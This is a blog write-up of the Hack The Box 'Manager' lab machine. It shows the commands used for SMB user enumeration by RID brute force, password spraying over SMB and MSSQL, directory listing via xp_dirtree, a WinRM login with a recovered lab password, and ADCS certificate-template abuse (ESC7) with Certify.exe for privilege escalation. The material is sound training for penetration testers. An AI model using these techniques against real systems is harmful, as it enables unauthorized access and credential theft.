Manager HTB Full Writeup

Introduction 👋🏽

In this post, Let’s see how to CTF the manager box and if you have any doubts comment down below 👇🏾

Let’s Begin

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on youtube.

https://www.youtube.com/@techyrick-/videos

Scanning

sudo nmap -sC -sV -O 10.10.11.236

It appears that there are numerous ports to observe, but what piques our interest are services like SMB, LDAP, web, MSSQL, and so on.

To initiate user enumeration, we employ the Crackmapexec program for brute-force attacks.

Enumeration

crackmapexec smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000

Following that, we will obtain user credentials through the brute-force process.

zhong
cheng
ryan
ravan
jinwoo
chinhae
operator

Once we have the list of users, we can proceed with password spraying. As usual, we will employ Crackmapexec and use the specified command for this task.

crackmapexec smb [ IP or Domain ] -u [ users list ] -p [ password list ]

In this scenario, the wordlist is utilized as the username. We’ll identify two users who can authenticate, and then we’ll switch from SMB to MSSQL and check if we can gain access there as well.

crackmapexec mssql [ IP or Domain ] -u [ users list ] -p [ password list ]

In this step, we observe that the operator’s users can authenticate with MSSQL. We establish a connection to it to check if there is any data or information inside by utilizing the specified command.

impacket-mssqlclient -port 1433 [ IP or Domain ]/operator:operator@[ IP Target ] -window

Upon gaining access, I inspected various tables, but I couldn’t find any data. This led me to believe that the objective might not be to retrieve data, but rather to execute a specific action.

So, I continued my search until I discovered a command that enabled me to browse the directory structure.

[Click Here] to learn more

EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;

Following that, we specified the path as C:\inetpub\wwwroot, which corresponds to the location of the IIS web server. Within the website itself, we searched for the backup file.

We navigated to the website and downloaded the file to investigate its contents, curious about any potential information or memes it might contain. Upon downloading it, we discovered that it contained a username and password for a user named Raven.

We utilized Evil-winrm to establish a connection using the specified command, and as a result, we successfully obtained the User flag.

evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'

Privilege Escalation

Subsequently, we checked our privileges using the provided command.

whoami /priv


We observed that SeMachineAccountPrivilege is enabled, and there are limited options available for searching and discovering an exploit. In order to proceed, we uploaded Certify.exe to the machine using the specified command.

upload [ Path File ]

Next, we ran the Certify.exe program using the provided command.

./Certify.exe find /vulnarable

In the quest to discover templates that possess vulnerabilities, we initiated our search.

Following this, we identified vulnerabilities in the SubCA template. To gather more information and insights related to SubCA, we referred to Hacktrick once again.

[Click Here] To learn more

[Click Here] To learn more

In relation to SubCA, we discovered the Vulnerable Certificate Authority Access Control (ESC7) issue, which we will utilize as Attack 2. To execute this, we employed the command as detailed in Hacktrick.

Once we have obtained the certificate, we proceed with the authentication process.

In this step, if anyone encounters an error, it’s necessary to synchronize the time with Kerberos. This can be achieved by using the specified command.

sudo ntpdate -u [ Domain ]

With the obtained hash, we can utilize evil-winrm with the final set of credentials, granting us access to the system at a higher privilege level. This access allows us to retrieve the root flag.

Conclusion


In conclusion, this box represented a challenging and multifaceted penetration testing scenario. We employed a combination of enumeration, exploitation, privilege escalation, and access control techniques to progressively advance through the system.

Our persistence and resourcefulness enabled us to uncover vulnerabilities and ultimately achieve the highest level of access, retrieving the root flag.

Share your love
Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site